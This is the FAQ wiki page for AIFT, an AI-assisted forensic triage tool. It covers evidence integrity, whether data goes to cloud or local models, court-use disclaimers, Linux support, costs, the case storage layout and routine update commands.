Skip to content

FAQ

Jump to bottom
Flip Forensics edited this page Mar 31, 2026 · 3 revisions

Frequently Asked Questions

Is my evidence modified during analysis?

No. AIFT never writes to or modifies evidence files. The Dissect framework opens disk images in read-only mode. Integrity is verified through a SHA-256 + MD5 hash chain: hashes are computed on intake and re-verified before report generation. The report shows a PASS/FAIL result for this verification. Hashing can optionally be disabled in Settings → Advanced for faster intake of large images, in which case the report shows SKIPPED.

Is my data sent to the cloud?

It depends on your AI provider.

  • Claude, OpenAI, or Kimi: Parsed artifact data (CSV excerpts) is sent to the provider's API servers for analysis. The original disk image is never sent — only extracted and filtered artifact records.
  • Local model (Ollama, LM Studio, vLLM): Everything stays on your machine. No data leaves your network. Set ai.provider to local for fully offline operation.

Choose your provider based on the sensitivity of the evidence.

Can I use AIFT output in court?

AIFT is a triage tool that accelerates initial forensic analysis. Every report includes this disclaimer:

"This report was generated with AI assistance. All findings should be independently verified by a qualified forensic examiner before being used in any legal or formal proceeding."

AIFT supports defensibility through: hash-verified evidence integrity, an append-only audit trail, saved prompts for reproducibility, citation spot-checking, and AI confidence ratings (HIGH/MEDIUM/LOW). However, all findings must be independently verified by a qualified examiner before being submitted in any legal, regulatory, or formal proceeding.

What Python versions are supported?

Python 3.10 through 3.13 (inclusive).

Python 3.9 and earlier lack required language features. Python 3.14+ is not yet supported due to potential breaking changes in dependencies, particularly the Dissect framework. If you run an unsupported version, AIFT exits immediately with a clear error message recommending Python 3.13.

Can I analyze Linux or macOS disk images?

Linux is fully supported. AIFT automatically detects the OS type when the image is opened and presents the appropriate artifact set — 25 Windows artifacts or 19 Linux artifacts. Linux support covers shell history (bash, zsh, fish), authentication logs (wtmp, btmp, lastlog), user/group accounts, sudoers, syslog, systemd journal, cron jobs, systemd services, SSH keys, package history, and network interfaces. Each Linux artifact has dedicated forensic analysis prompts.

macOS is not currently supported. The Dissect framework supports macOS, but AIFT's artifact selection and AI prompts have not yet been built for macOS forensics.

How much does it cost to use?

AIFT itself is free. AI provider costs vary:

  • Local models: $0 — runs on your own hardware
  • Cloud providers: Costs depend on the provider and model. A typical full analysis with multiple artifacts may use 50K–200K tokens. Approximate per-analysis costs range from under $1 to a few dollars depending on the model and amount of artifact data.

You are responsible for your own API key and associated costs.

Can I run multiple analyses simultaneously?

No. AIFT is a single-process, single-user application. It uses background threads for parsing and analysis but is designed for one active session at a time. Running multiple browser tabs against the same instance may cause unexpected behavior.

Where is my data stored?

All case data is stored locally in the cases/ directory under the project root. Each analysis gets a UUID directory:

cases/<uuid>/
├── audit.jsonl          # Append-only audit trail
├── case.json            # Case metadata
├── evidence/            # Uploaded evidence files (upload mode only)
├── parsed/              # Parsed artifact CSV files
├── prompts/             # Every prompt sent to the AI
└── report/              # Generated HTML report

No database is used. All data is in CSV, JSON, and JSONL files on disk.

Can I customize what the AI looks for?

Yes, in several ways:

  1. Investigation context — When setting up an analysis, you provide a free-text description of the investigation (dates, suspects, IOCs, what you're looking for). This is included in the AI prompt and directly shapes the analysis focus.

  2. Artifact column filtering — Edit config/artifact_ai_columns.yaml to control which CSV columns are sent to the AI per artifact type. This reduces noise and focuses the AI on forensically relevant fields. See Configuration Reference.

  3. Prompt templates — The prompt templates in the prompts/ directory control how the AI is instructed. The system prompt, artifact analysis prompt, chunk merge prompt, and summary prompt can all be reviewed and understood from these files.

What if my evidence file is too large to upload?

Use path mode. Instead of uploading through the browser, select the local path option in the evidence step and enter the filesystem path to your E01, ZIP, or directory. AIFT reads the evidence directly from disk without copying it, which is faster and avoids browser upload size limits.

You can also set a maximum upload size via Settings → Advanced → Evidence Size Threshold (GB). The default is 0 (unlimited). When set to a positive value, uploads exceeding the threshold are rejected with a suggestion to use path mode.

How do I update AIFT?

Pull the latest code and reinstall dependencies:

git pull
pip install -r requirements.txt

Your existing config.yaml will be preserved — new default settings are merged automatically on startup. Case data in cases/ is not affected by updates.

Getting Started

Usage Guide

Advanced

Reference

Code Reference (API Docs)

Clone this wiki locally